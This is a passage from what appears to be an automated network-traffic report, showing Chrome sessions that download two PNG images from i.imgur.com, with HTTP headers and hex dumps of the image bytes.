db 0f 01 00 00 c0 40 84 3f 4a 10 04 81 a5 eb b3 75 7f 41 41 c1 dc b9 73 17 2c 58 50 52 52 62 32 99 ec 76 bb cf e7 ab ed 27 b3 d5 3c fd 49 Data Ascii: 4S@P,.{do#G.@5yhbmlES'###55h4+ObD<gLy$(.X`N~G@}$+Fc?>HQ3g;GKtk-i{K<Wz>Xf{FU@?JuAAs,XPRRb2v'<I
2025-03-24 20:29:40 UTC	1371	IN	Data Raw: 15 15 15 4c ec 03 a6 22 32 1f 3f 1d 4c 66 01 83 c1 30 7a f4 e8 f1 e3 c7 a7 a5 a5 85 6f c0 00 00 d0 a0 81 ea 47 1c 14 ee 0e 78 d8 a2 45 8b c6 8c 19 53 5c 5c 1c c2 3f c1 8a dd 5a ad 56 9f cf c7 71 5c db b6 6d 37 6e dc 18 17 17 67 b3 d9 2a 25 de 87 1b 51 14 1f 79 e4 91 ff fd df ff 25 39 3f 7f fe 7c b5 c2 1f 8c 8f df 6c 36 0f 1c 38 70 da b4 69 e4 33 84 9d 0f 00 00 2a 81 08 7f c4 11 8c dc 2e 5c b8 70 fa f4 e9 05 05 05 54 0a b7 b6 9f 4f 85 71 52 52 52 68 b9 7c e7 9d 77 fe f3 9f ff 6c d2 a4 09 49 be 7a 27 5e dd cb 27 4c 18 8d c6 56 ad 5a 71 1c 97 9d 9d 5d 5e 5e 6e b5 5a 5d 2e 97 db ed b6 58 2c ea 7f 9d 02 fb 26 93 a9 a6 3a 04 e4 e3 3f 79 f2 a4 ba 1f 3f 6b 4a 04 00 00 00 aa df 90 20 09 14 45 f1 bd f7 de 9b 3c 79 72 7e 7e be d9 6c 0e c1 94 4f da 69 b3 d9 4a 4b 4b Data Ascii: L"2?Lf0zoGxES\\?ZVq\m7ng%Qy%9?\|l68pi3.\pTOqRRRh\|wlIz'^'LVZq]^^nZ].X,&:?y?kJ E<yr~~lOiJKK
2025-03-24 20:29:40 UTC	1371	IN	Data Raw: ab 55 c7 53 a9 4b a8 83 0e f9 f8 3d 1e cf d1 a3 47 7d 3e 1f 2d f4 59 25 c1 9a 36 f5 69 cb 9f 22 25 54 9e 48 14 45 af d7 0b 1f 3f 00 20 36 81 73 2f 52 c8 cb cb 9b 32 65 ca 47 1f 7d 44 5e 3b e1 02 06 83 21 2e 2e 4e 14 45 ed 7d 7d 52 7d 52 3e 2a 64 6b 36 9b 37 6e dc d8 b5 6b 57 1d cf 40 0f 3c 1e cf 8d 37 de b8 7d fb 76 b7 db cd f3 3c c9 79 40 1f bf c3 e1 50 14 85 fe 1f da 6c 36 56 d9 10 3e 7e 00 40 ac d1 90 12 bb 1a 28 1a cb 50 b6 7c cf ce ce 1e 39 72 e4 a2 45 8b e8 4f b7 db cd 5e 2a 2b 2b 23 b9 aa 94 9f cf 48 48 48 20 f7 5a 7c 7c 3c 6d ed f7 ee dd fb b7 df 7e 8b 3e c9 a7 3a 45 1b 36 6c e8 df bf 3f ed 59 24 24 24 50 be 82 c5 62 a9 94 a5 68 34 1a d9 8e 86 db ed 66 d3 26 af d7 cb be 91 05 0b 16 8c 1e 3d fa d0 a1 43 f4 67 08 e5 8d 01 00 a0 61 81 08 7f d8 d1 b0 Data Ascii: USK=G}>-Y%6i"%THE? 6s/R2eG}D^;!..NE}}R}R>dk67nkW@<7}v<y@Pl6V>~@(P\|9rEO^++#HHH Z\|\|<m~>:E6l?Y$$$Pbh4f&=Cga
2025-03-24 20:29:40 UTC	1371	IN	Data Raw: de 7d fb f6 29 8a 02 1f 3f 00 a0 a1 03 bf 7e 18 f9 f5 d7 5f 6f bf fd f6 b3 67 cf 5a 2c 16 5a af d3 da 5d 92 24 9b cd a6 b1 bb cf 1c e7 f4 20 21 21 a1 57 af 5e 2b 57 ae b4 d9 6c fa 9e 41 83 27 64 1f bf 24 49 34 45 a3 5a fd 34 f7 1a 37 6e dc d8 b1 63 d5 7b fc 55 d3 36 01 00 20 92 81 25 a9 8e 61 8b f8 8d 1b 37 0e 1b 36 ec ec d9 b3 a4 3d 34 bb 12 45 91 84 87 49 3e 2b a7 4f e9 7b 1c c7 31 3b 7e 42 42 02 3d b8 f3 ce 3b 21 f9 a1 51 93 8f 9f 59 f6 09 da 55 61 fa 5d 5e 5e ce ea 28 78 3c 1e f6 9d be f6 da 6b 23 47 8e 3c 72 e4 08 fd 29 08 02 24 1f 00 d0 b0 40 84 bf 2e 51 14 85 dc f6 bb 76 ed 9a 31 63 c6 fa f5 eb 2d 16 8b 76 8d 17 16 6b 61 f6 3c 2a ba 27 cb b2 c7 e3 31 9b cd 4f 3e f9 e4 c8 91 23 11 58 0e 19 f2 f1 cb b2 bc 77 ef 5e b7 db 6d b7 db 5d 2e 97 db ed 66 33 Data Ascii: })?~_ogZ,Z]$ !!W^+WlA'd$I4EZ47nc{U6 %a76=4EI>+O{1;~BB=;!QYUa]^^(x<k#G<r)$@.Qv1c-vka<*'1O>#Xw^m].f3
2025-03-24 20:29:40 UTC	1371	IN	Data Raw: 7e f8 e1 a1 87 1e ca cb cb a3 4b ba ac ac 4c 96 65 9e e7 99 c3 48 92 24 9f cf 47 9e 94 a2 a2 a2 23 47 8e dc 73 cf 3d f5 3d 70 10 5e a0 fa a1 40 92 ff eb af bf 4e 99 32 e5 f0 e1 c3 d4 2f a7 b6 6e 08 12 92 c7 1e 7b 6c c6 8c 19 b4 59 00 c9 d7 19 b5 8f bf 7b f7 ee 65 65 65 db b7 6f af ad 8f df 64 32 09 82 a0 f6 f1 53 3f 7e f8 f8 41 fd b2 7c f9 f2 91 23 47 16 14 14 50 6b 69 ba e1 a8 a7 b0 74 db 61 7d a4 14 45 39 78 f0 e0 ed b7 df de a4 49 93 7a 1d 38 08 2f 50 fd 5a 43 e1 fd a2 a2 a2 59 b3 66 ad 5e bd 3a 98 ce ad d5 62 b1 58 ee bd f7 de 09 13 26 20 1a 5c bf d0 8e 7e 72 72 72 68 3e 7e 93 c9 44 0d 96 d4 3e fe 9c 9c 1c ea c7 0f 1f 3f d0 1f bf df bf 6c d9 b2 b9 73 e7 ee dd bb 97 d5 0e b1 58 2c 0e 87 83 1e 3b 9d 4e 8a 35 92 9f 85 2e 60 45 51 44 51 6c d4 a8 51 bf 7e Data Ascii: ~KLeH$G#Gs==p^@N2/n{lY{eeeod2S?~A\|#GPkita}E9xIz8/PZCYf^:bX& \~rrrh>~D>?lsX,;N5.`EQDQlQ~
2025-03-24 20:29:40 UTC	1371	IN	Data Raw: 6a fd e6 9b 6f d8 ce 3d 68 88 f8 fd 7e 56 a2 3c 21 21 81 1e b0 0a 3f 44 25 1f bf 06 c3 86 0d a3 8f ad a8 a8 a8 ef 33 03 0d 92 a5 4b 97 a6 a7 a7 53 05 1e 8d 2b 8d 5d a2 64 3d 65 8f 0d 06 43 62 62 22 bd da ae 5d bb e5 cb 97 d7 f7 09 01 9d 40 84 3f 00 54 63 67 e5 ca 95 9f 7f fe 39 f9 f4 6a 82 b5 cd 65 6d 2d 98 cb 6b e4 c8 91 0f 3f fc b0 d5 6a 85 71 ab e1 c2 f3 7c cb 96 2d 65 59 56 f7 e3 77 bb dd b5 ed c7 4f 1c 3b 76 4c 92 a4 bf fd ed 6f b4 4f 84 fd 1d 50 2b 96 2e 5d 3a 6d da b4 c3 87 0f 07 ac f3 a1 76 99 b2 c7 1c c7 c5 c7 c7 9f 3f 7f 5e 96 e5 ac ac ac d1 a3 47 df 7d f7 dd b8 08 63 85 fa 9e 76 44 34 1e 8f 47 51 94 bc bc bc 9b 6f be 99 fe 77 69 af f5 69 e2 4c 3d 57 d8 cc ba 53 a7 4e c7 8e 1d ab ef 53 01 75 c3 a1 43 87 fe eb bf fe 8b be 6e 5a 63 31 81 57 5f 1b Data Ascii: jo=h~V<!!?D%3KS+]d=eCbb"]@?Tcg9jem-k?jq\|-eYVwO;vLoOP+.]:mv?^G}cvD4GQowiiL=WSNSuCnZc1W_
2025-03-24 20:29:40 UTC	1371	IN	Data Raw: be 42 20 a1 3a 36 81 2f 1f 84 15 a8 fe 5f a0 9b f5 d9 b3 67 3f f9 e4 13 ba e7 32 87 2b 9b 44 6b 7f c2 ed b7 df 7e fd f5 d7 ab df 08 a2 1e ea 9a 68 30 18 2e bd f4 d2 71 e3 c6 5d 77 dd 75 21 7c 88 d9 6c ce cb cb 5b b7 6e 5d 18 06 08 1a 12 a1 f5 cb 57 d7 d8 67 21 81 b4 b4 b4 99 33 67 3e f8 e0 83 f4 a7 28 8a 54 6d 0c 61 a4 58 06 aa ff 17 28 b8 fa d5 57 5f 9d 3c 79 92 04 5e dd 4f 5d bb 59 b5 28 8a 8d 1a 35 7a f0 c1 07 69 4a ae ee a3 0f a2 1b 8e e3 58 06 f5 35 d7 5c f3 d0 43 0f a5 a4 a4 d4 f6 43 28 ee fa d5 57 5f 51 55 47 10 83 c0 97 0f 74 00 aa ff 27 14 d2 17 45 71 e5 ca 95 ec c7 43 6d 2a 58 b1 55 ed 39 72 87 0e 1d ae bd f6 5a 0a a3 e9 38 70 50 9f b0 4b 42 10 04 7a 7c d7 5d 77 3d fc f0 c3 b5 fd 1c 59 96 39 8e db b0 61 03 25 6c 83 18 04 be 7c a0 03 50 fd 3f a1 Data Ascii: B :6/_g?2+Dk~h0.q]wu!\|l[n]Wg!3g>(TmaX(W_<y^O]Y(5ziJX5\CC(W_QUGt'EqCm*XU9rZ8pPKBz\|]w=Y9a%l\|P?
2025-03-24 20:29:40 UTC	1371	IN	Data Raw: d0 a0 81 03 07 d2 f3 f0 e5 83 d0 80 ea 1b 28 81 bf 56 de 2a fa 8d 25 24 24 b4 6d db 56 97 01 82 86 8a cf e7 a3 1b 7d 90 f7 65 3a 8c f6 71 c3 3f 3a 10 5e c8 97 bf 7f ff fe b8 b8 38 ca c2 a3 1a ba e4 cb b7 5a ad 54 e6 ab 26 e8 56 c3 56 f9 83 06 0d 1a 3e 7c 38 7b 95 f9 f2 65 59 46 f3 5c 10 3c b8 b3 18 dc 6e 37 f5 d9 a3 1b 6e c0 58 19 a5 ee 1b 0c 86 e1 c3 87 23 b0 06 b4 d9 bb 77 2f b3 60 49 92 a4 a1 e5 14 ec 95 24 89 dc 59 8d 1b 37 d6 77 a4 a1 a0 2d 5a 31 0e f5 cb df bf 7f bf c3 e1 20 c9 af b6 5f 3e 05 17 ab 9d ea c5 c5 c5 91 ea b7 6f df fe bd f7 de 53 4b 3e 03 fd f2 41 6d c1 5a df 70 e8 d0 21 8a b6 a9 db ea 68 37 e0 a1 fb 78 46 46 06 02 6b 40 9b 9c 9c 1c 75 8a b5 46 e5 47 36 83 54 14 25 35 35 55 c7 31 d6 1a 3a 05 ab d5 4a b9 e8 f9 f9 f9 a7 4f 9f 3e 7e fc b8 Data Ascii: (V*%$$mV}e:q?:^8ZT&VV>\|8{eYF\<n7nX#w/`I$Y7w-Z1 _>oSK>AmZp!h7xFFk@uFG6T%55U1:JO>~
2025-03-24 20:29:40 UTC	1371	IN	Data Raw: fa 6a ba ef 87 61 74 b5 a3 ea 52 9e 54 9f e7 79 a3 d1 58 ab 8e c0 91 70 3a 75 88 20 08 6b d7 ae 7d e6 99 67 76 ef de 5d c9 97 af fd 46 b5 2f 9f 24 5f 51 94 aa be 7c 48 3e 08 2b 31 ad fa 05 05 05 da 5b 71 d5 92 96 96 96 98 98 18 9e 11 81 06 cc f6 ed db 47 8d 1a f5 d3 4f 3f 71 1c 17 da ea f6 96 5b 6e c9 cc cc 0c c3 d0 ea 0c 2a bb 4b 45 87 aa 0d 59 57 4b 30 db ff 0d 08 f8 f2 41 83 26 a6 27 95 05 05 05 21 dc 8f d0 5d 17 54 65 d7 ae 5d 2f bf fc f2 f7 df 7f 4f 2d 98 43 88 21 b5 6e dd fa 9e 7b ee 21 d9 88 cc d5 5e a5 08 7f 90 92 1f 4d 84 a3 5f fe 5d 77 dd 45 cf c3 97 0f f4 21 76 af 2d 49 92 42 b8 35 1b 0c 86 66 cd 9a 85 61 38 a0 01 93 97 97 37 65 ca 94 65 cb 96 51 f0 b6 a4 a4 24 84 e2 f3 dd ba 75 23 47 a8 76 ad fe fa 85 75 ac a8 94 8b ae 31 4d 89 26 cf 1e 7c f9 Data Ascii: jatRTyXp:u k}gv]F/$_Q\|H>+1[qGO?q[n*KEYWK0A&'!]Te]/O-C!n{!^M_]wE!v-IB5fa87eeQ$u#Gvu1M&\|

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.5	49740	199.232.192.193	443	1488	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2025-03-24 20:29:40 UTC	386	OUT	GET /0HdPsKK.png HTTP/1.1 Host: i.imgur.com Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 Accept: / Sec-Fetch-Site: none Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Sec-Fetch-Storage-Access: active Accept-Encoding: gzip, deflate, br, zstd Accept-Language: en-US,en;q=0.9
2025-03-24 20:29:40 UTC	756	IN	HTTP/1.1 200 OK Connection: close Content-Length: 5579 Content-Type: image/png Last-Modified: Thu, 20 Feb 2025 02:14:56 GMT ETag: "28a8812c3aaf8af83ba5c83c58750528" x-amz-server-side-encryption: AES256 X-Amz-Cf-Pop: IAD89-P1 X-Amz-Cf-Id: YYTlmwzZRLqXoGXppDaHC3Gtdw92u8SHfCwF9eVUy31VA6g75HGzNw== cache-control: public, max-age=31536000 Accept-Ranges: bytes Date: Mon, 24 Mar 2025 20:29:40 GMT Age: 2551237 X-Served-By: cache-iad-kiad7000021-IAD, cache-lga21927-LGA X-Cache: Miss from cloudfront, HIT, HIT X-Cache-Hits: 11253, 1 X-Timer: S1742848181.521530,VS0,VE1 Strict-Transport-Security: max-age=300 Access-Control-Allow-Methods: GET, OPTIONS Access-Control-Allow-Origin: * Server: cat factory 1.0 X-Content-Type-Options: nosniff
2025-03-24 20:29:40 UTC	1371	IN	Data Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 01 00 00 00 00 55 08 06 00 00 00 a6 46 3a 96 00 00 15 92 49 44 41 54 78 9c ec 9d 0b 94 5b 55 bd ff bf bf 73 92 4c 87 4e 0b 14 da 22 85 ce b4 50 40 d4 5a 44 84 76 48 ce 49 67 0a 88 2f a4 88 8a 02 ca fa 03 fe 51 c1 85 02 2e 04 9a b2 00 29 78 e1 e2 c5 07 57 91 87 d6 8b 08 f5 a2 82 80 b4 d9 c9 cc 14 aa 94 87 0f b4 0a a5 14 4a 6b a9 d4 76 66 3a d3 49 72 7e 77 9d 24 33 ce 24 fb 24 27 cf 33 e9 ec cf 5a b3 26 d9 cf ef 49 b2 7f fb bd b7 0f 0a c5 04 a1 ef c6 39 33 91 e4 d3 99 71 1a 33 e6 10 61 0a c0 53 19 98 4a a0 96 7f 87 e4 1d 0c fc 8e 40 bf d7 60 3d 9b 0a a4 9e 9e 7a f5 96 7f 7a a9 bd 56 90 d7 02 14 8a 5a 32 70 c3 9c d6 64 d2 ba 08 a0 0f 01 78 6f 05 49 fd 01 b0 1e 06 f0 d0 94 c8 e6 97 aa 28 d1 53 94 01 50 ec Data Ascii: PNGIHDRUF:IDATx[UsLN"P@ZDvHIg/Q.)xWJkvf:Ir~w$3$$'3Z&I93q3aSJ@`=zzVZ2pdxoI(SP
2025-03-24 20:29:40 UTC	1371	IN	Data Raw: 34 f9 e0 31 ce b4 df 3b 6a 97 27 e1 a4 a1 ff 35 22 40 ec ba e2 41 15 0a 17 ec 5e d6 7a 35 11 be 61 ff 74 bd d6 d2 28 d0 7e 07 a2 f9 bc 95 d0 66 4a 06 e8 53 7b 91 78 ec 4c 20 59 bb 9b c3 fc 9c 3c 82 96 76 6f 2c 14 46 b5 00 14 05 e9 bd be cd 80 85 fb 01 cc f6 5a 4b 23 a1 1d 7c 04 9a 3f 7b 1f 68 ff 59 f2 00 7a 13 f4 a3 3e 8d d4 4b 77 d7 4c c3 10 e9 37 03 38 bb 50 18 35 08 a8 70 a4 2f d2 7a 0e 2c 7e 4a 15 fe d2 f0 7f e0 3c ec 77 f1 a3 ce 85 3f 0b cd fb 24 68 c6 09 35 d3 41 8c a5 fc ab c5 05 45 28 03 a0 90 b2 3b d2 b6 82 41 2b 01 52 ad 44 17 50 cb 74 f8 17 5d 84 c9 5f 5e 83 a6 0f 2e 07 7c 4d c5 e3 68 7e f8 da 6f 81 36 e7 63 35 12 45 5a 22 91 ba bc 60 90 da e4 ac 68 64 fa 96 b7 5d c6 8c ff f4 5a 47 4d b0 0b a6 a6 03 a4 a7 2f 1a a2 e1 d7 9a 96 fd 6f bf d7 d2 ff Data Ascii: 41;j'5"@A^z5at(~fJS{xL Y<vo,FZK#\|?{hYz>KwL78P5p/z,~J<w?$h5AE(;A+RDPt]_^.\|Mh~o6c5EZ"`hd]ZGM/o
2025-03-24 20:29:40 UTC	1371	IN	Data Raw: fa a6 69 7e 4b 08 51 93 93 32 42 a1 d0 22 22 ac c8 3d fc 9a 08 f6 e7 54 b6 01 20 c2 25 00 bd ab 48 98 31 0d 6c c3 30 77 12 e1 16 21 c4 cd 2e b3 69 a9 e4 fb 20 42 3f 80 3c 03 60 18 e1 eb 00 1c d1 dc dc bc 33 1c 0e ff 66 4c 17 20 14 0a cd 63 a6 f5 44 da 2d 00 1d 50 3c 13 5a a2 69 78 c4 34 cd 7b ca 15 5a 6d 4c d3 bc 9d 48 8b 3b 15 fe b1 d0 c1 00 dd 69 9a e1 67 82 c1 60 0d 2f 6c af 17 e9 e7 f9 8c a6 f1 6a c3 30 9f ec e8 e8 70 bc 12 6a 22 a0 69 da 97 e5 3e 74 b0 69 9a e7 d7 53 0b 11 1d 08 d0 37 0d 23 1c eb ec ec dc bf 9e 79 0f 63 18 c6 12 66 7a 06 e0 29 cc 34 c3 6e dd 8f 18 80 70 38 7c 3c 91 b6 9e 08 c7 96 9e 34 7d ce 30 c2 45 b7 3e 31 53 4d ef 21 30 4d f3 71 80 be 52 46 d4 13 75 5d 7f 6e f1 e2 c5 ad c5 02 32 b3 f4 19 9c dc 8b f9 d5 0a db 38 a7 52 a9 67 3b 3a Data Ascii: i~KQ2B""=T %H1l0w!.i B?<`3fL cD-P<Zix4{ZmLH;ig`/lj0pj"i>tiS7#ycfz)4np8\|<4}0E>1SM!0MqRFu]n28Rg;:
2025-03-24 20:29:40 UTC	1371	IN	Data Raw: e9 af 37 3e 22 6c 01 c6 4e 01 12 e1 7d c1 60 70 7a 57 57 97 b4 70 95 0b 33 51 0d 96 02 49 8f 5e 65 e6 25 00 d6 15 8a 18 0c 06 df 41 44 ef c9 75 27 42 a1 2f c7 69 d9 aa a3 c1 91 75 b3 b2 1a 77 15 d2 e7 44 21 63 e3 34 b7 cd 4c af 95 93 97 3b 3d e3 63 11 10 91 f6 c5 5c 37 66 fc c1 b2 ac 79 a6 69 ce cb 3a 49 47 fc 75 5d bf 14 40 91 be 75 35 e0 fb 84 10 05 c7 d7 90 5d 08 a4 eb d2 ad 3a 1b 8a 4f b9 f2 a0 5b 35 3e 66 ea 22 c2 82 5c 0f 5d d7 bf 0a c0 51 a8 69 9a 2d cc f8 1b 51 7e 6b 61 60 60 cf fe eb d6 ad ab d7 65 68 4f c9 9d e9 0b ed ed ed 77 f4 f4 f4 f4 3a 45 d4 75 5d ba 70 89 d9 f9 98 6c 22 da 29 5f ce a4 1d 59 40 e3 09 32 47 cb b2 a4 f7 b5 55 06 fd 87 dc dd 72 f8 9c 8a e1 66 1d 00 ff a3 bc b4 ab 47 38 1c 5e ca 8c 59 b9 ee 44 98 0f 50 b4 78 0a 74 7e 47 47 c7 Data Ascii: 7>"lN}`pzWWp3QI^e%ADu'B/iuwD!c4L;=c\7fyi:IGu]@u5]:O[5>f"\]Qi-Q~ka``ehOw:Eu]pl")_Y@2GUrfG8^YDPxt~GG
2025-03-24 20:29:40 UTC	95	IN	Data Raw: 4b b7 97 77 74 74 cc 4c a5 52 3f c9 f7 e1 bc 01 38 19 42 88 87 4c d3 8c e4 0f 6c 51 c1 c1 59 66 7c 57 72 26 a0 54 63 2c 16 5d 66 9a 66 22 b7 ac 11 01 93 26 4d 3a 56 b6 79 0b 99 59 80 de 0a 3e af 51 69 14 e6 ff 02 00 00 ff ff 5a 98 a3 a9 0f 7b c2 43 00 00 00 00 49 45 4e 44 ae 42 60 82 Data Ascii: KwttLR?8BLlQYf\|Wr&Tc,]ff"&M:VyY>QiZ{CIENDB`

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.5	49741	199.232.192.193	443	1488	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2025-03-24 20:29:40 UTC	386	OUT	GET /KAb5SEy.png HTTP/1.1 Host: i.imgur.com Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 Accept: / Sec-Fetch-Site: none Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Sec-Fetch-Storage-Access: active Accept-Encoding: gzip, deflate, br, zstd Accept-Language: en-US,en;q=0.9
2025-03-24 20:29:40 UTC	757	IN	HTTP/1.1 200 OK Connection: close Content-Length: 48869 Content-Type: image/png Last-Modified: Thu, 20 Feb 2025 13:35:05 GMT ETag: "8aa14660517f5460156fccc2199cf83c" x-amz-server-side-encryption: AES256 X-Amz-Cf-Pop: IAD89-P1 X-Amz-Cf-Id: ZMDtIIYNSizYrfDVWXb5ZuJtkSbNLszxoUAHUCL9zZz9IlMMufkJOg== cache-control: public, max-age=31536000 Accept-Ranges: bytes Date: Mon, 24 Mar 2025 20:29:40 GMT Age: 2600253 X-Served-By: cache-iad-kjyo7100129-IAD, cache-lga21926-LGA X-Cache: Miss from cloudfront, HIT, HIT X-Cache-Hits: 14884, 1 X-Timer: S1742848181.527641,VS0,VE2 Strict-Transport-Security: max-age=300 Access-Control-Allow-Methods: GET, OPTIONS Access-Control-Allow-Origin: * Server: cat factory 1.0 X-Content-Type-Options: nosniff
2025-03-24 20:29:40 UTC	1371	IN	Data Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 02 a7 00 00 02 3e 08 02 00 00 00 0e ee 34 d8 00 00 80 00 49 44 41 54 78 9c ec bd 77 7c 14 e5 da ff bf b3 b3 7d 37 3d 10 0c 3d 94 50 42 11 54 10 8f 22 d6 a3 1e 45 e4 b1 60 45 54 1e 11 45 ba 22 52 45 a4 89 05 eb 51 44 fd 3e 3e a8 14 c1 47 39 08 7a 10 14 50 94 5e 12 6a 28 21 04 48 48 48 d9 36 ed f7 3a 5c fe 6e c7 94 d9 cd 92 9d 6c 76 3f ef 3f 7c 6d 76 67 97 7b dc d9 f9 dc f7 75 5f 9f eb 32 29 8a 62 00 00 00 00 40 0c 60 ac ef 01 00 00 00 00 40 27 a0 fa 00 00 00 40 ac 00 d5 07 00 00 00 62 05 a8 3e 00 00 00 10 2b 40 f5 01 00 00 80 58 01 aa 0f 00 00 00 c4 0a 50 7d 00 00 00 20 56 80 ea 03 00 00 00 b1 02 54 1f 00 00 00 88 15 a0 fa 00 00 00 40 ac 00 d5 07 00 00 00 62 05 a8 3e 00 00 00 10 2b 40 f5 01 00 00 80 58 Data Ascii: PNGIHDR>4IDATxw\|}7==PBT"E`ETE"REQD>>G9zP^j(!HHH6:\nlv??\|mvg{u_2)b@`@'@b>+@XP} VT@b>+@X
2025-03-24 20:29:40 UTC	1371	IN	Data Raw: 95 de 05 00 00 20 34 f8 a9 53 a7 d6 f7 18 40 1d 50 a9 2c 2e 7b 92 64 d8 ef f7 7f f0 c1 07 6f bf fd f6 91 23 47 2e fe df a2 cf ac a9 05 1f 1d 40 35 79 68 f6 c0 f3 bc c5 62 a9 6d 96 80 d9 6c 16 45 f1 d4 a9 53 1e 8f 27 23 23 23 35 35 d5 68 34 92 2b e1 e2 4f 01 00 00 62 13 44 f8 1b 3c b4 94 67 02 4c 79 fb a4 8e 24 90 a2 28 2e 58 b0 60 ee dc b9 a7 4e 9d ba 98 7f a8 da 9d 7e b5 47 40 7d 24 2b d3 1b f2 05 46 19 00 b4 0b f0 d8 63 8f 8d 1f 3f 1e 8e 3e 00 00 b8 48 a0 fa 51 8e db ed 9e 33 67 ce 82 05 0b ce 9d 3b 47 4b f0 da c6 c9 d5 95 74 6b 82 2d fd 69 7b be ea 4b 3c cf 57 7a 3e 18 58 8e a1 cd 66 7b e0 81 07 46 8e 1c 99 95 95 55 db 0f 01 00 00 c0 40 84 3f 4a 10 04 81 a5 eb b3 75 7f 41 41 c1 dc b9 73 17 2c 58 50 52 52 62 32 99 ec 76 bb cf e7 ab ed 27 b3 d5 3c fd 49 Data Ascii: 4S@P,.{do#G.@5yhbmlES'###55h4+ObD<gLy$(.X`N~G@}$+Fc?>HQ3g;GKtk-i{K<Wz>Xf{FU@?JuAAs,XPRRb2v'<I
2025-03-24 20:29:40 UTC	1371	IN	Data Raw: 15 15 15 4c ec 03 a6 22 32 1f 3f 1d 4c 66 01 83 c1 30 7a f4 e8 f1 e3 c7 a7 a5 a5 85 6f c0 00 00 d0 a0 81 ea 47 1c 14 ee 0e 78 d8 a2 45 8b c6 8c 19 53 5c 5c 1c c2 3f c1 8a dd 5a ad 56 9f cf c7 71 5c db b6 6d 37 6e dc 18 17 17 67 b3 d9 2a 25 de 87 1b 51 14 1f 79 e4 91 ff fd df ff 25 39 3f 7f fe 7c b5 c2 1f 8c 8f df 6c 36 0f 1c 38 70 da b4 69 e4 33 84 9d 0f 00 00 2a 81 08 7f c4 11 8c dc 2e 5c b8 70 fa f4 e9 05 05 05 54 0a b7 b6 9f 4f 85 71 52 52 52 68 b9 7c e7 9d 77 fe f3 9f ff 6c d2 a4 09 49 be 7a 27 5e dd cb 27 4c 18 8d c6 56 ad 5a 71 1c 97 9d 9d 5d 5e 5e 6e b5 5a 5d 2e 97 db ed b6 58 2c ea 7f 9d 02 fb 26 93 a9 a6 3a 04 e4 e3 3f 79 f2 a4 ba 1f 3f 6b 4a 04 00 00 00 aa df 90 20 09 14 45 f1 bd f7 de 9b 3c 79 72 7e 7e be d9 6c 0e c1 94 4f da 69 b3 d9 4a 4b 4b Data Ascii: L"2?Lf0zoGxES\\?ZVq\m7ng%Qy%9?\|l68pi3.\pTOqRRRh\|wlIz'^'LVZq]^^nZ].X,&:?y?kJ E<yr~~lOiJKK
2025-03-24 20:29:40 UTC	1371	IN	Data Raw: ab 55 c7 53 a9 4b a8 83 0e f9 f8 3d 1e cf d1 a3 47 7d 3e 1f 2d f4 59 25 c1 9a 36 f5 69 cb 9f 22 25 54 9e 48 14 45 af d7 0b 1f 3f 00 20 36 81 73 2f 52 c8 cb cb 9b 32 65 ca 47 1f 7d 44 5e 3b e1 02 06 83 21 2e 2e 4e 14 45 ed 7d 7d 52 7d 52 3e 2a 64 6b 36 9b 37 6e dc d8 b5 6b 57 1d cf 40 0f 3c 1e cf 8d 37 de b8 7d fb 76 b7 db cd f3 3c c9 79 40 1f bf c3 e1 50 14 85 fe 1f da 6c 36 56 d9 10 3e 7e 00 40 ac d1 90 12 bb 1a 28 1a cb 50 b6 7c cf ce ce 1e 39 72 e4 a2 45 8b e8 4f b7 db cd 5e 2a 2b 2b 23 b9 aa 94 9f cf 48 48 48 20 f7 5a 7c 7c 3c 6d ed f7 ee dd fb b7 df 7e 8b 3e c9 a7 3a 45 1b 36 6c e8 df bf 3f ed 59 24 24 24 50 be 82 c5 62 a9 94 a5 68 34 1a d9 8e 86 db ed 66 d3 26 af d7 cb be 91 05 0b 16 8c 1e 3d fa d0 a1 43 f4 67 08 e5 8d 01 00 a0 61 81 08 7f d8 d1 b0 Data Ascii: USK=G}>-Y%6i"%THE? 6s/R2eG}D^;!..NE}}R}R>dk67nkW@<7}v<y@Pl6V>~@(P\|9rEO^++#HHH Z\|\|<m~>:E6l?Y$$$Pbh4f&=Cga
2025-03-24 20:29:40 UTC	1371	IN	Data Raw: de 7d fb f6 29 8a 02 1f 3f 00 a0 a1 03 bf 7e 18 f9 f5 d7 5f 6f bf fd f6 b3 67 cf 5a 2c 16 5a af d3 da 5d 92 24 9b cd a6 b1 bb cf 1c e7 f4 20 21 21 a1 57 af 5e 2b 57 ae b4 d9 6c fa 9e 41 83 27 64 1f bf 24 49 34 45 a3 5a fd 34 f7 1a 37 6e dc d8 b1 63 d5 7b fc 55 d3 36 01 00 20 92 81 25 a9 8e 61 8b f8 8d 1b 37 0e 1b 36 ec ec d9 b3 a4 3d 34 bb 12 45 91 84 87 49 3e 2b a7 4f e9 7b 1c c7 31 3b 7e 42 42 02 3d b8 f3 ce 3b 21 f9 a1 51 93 8f 9f 59 f6 09 da 55 61 fa 5d 5e 5e ce ea 28 78 3c 1e f6 9d be f6 da 6b 23 47 8e 3c 72 e4 08 fd 29 08 02 24 1f 00 d0 b0 40 84 bf 2e 51 14 85 dc f6 bb 76 ed 9a 31 63 c6 fa f5 eb 2d 16 8b 76 8d 17 16 6b 61 f6 3c 2a ba 27 cb b2 c7 e3 31 9b cd 4f 3e f9 e4 c8 91 23 11 58 0e 19 f2 f1 cb b2 bc 77 ef 5e b7 db 6d b7 db 5d 2e 97 db ed 66 33 Data Ascii: })?~_ogZ,Z]$ !!W^+WlA'd$I4EZ47nc{U6 %a76=4EI>+O{1;~BB=;!QYUa]^^(x<k#G<r)$@.Qv1c-vka<*'1O>#Xw^m].f3
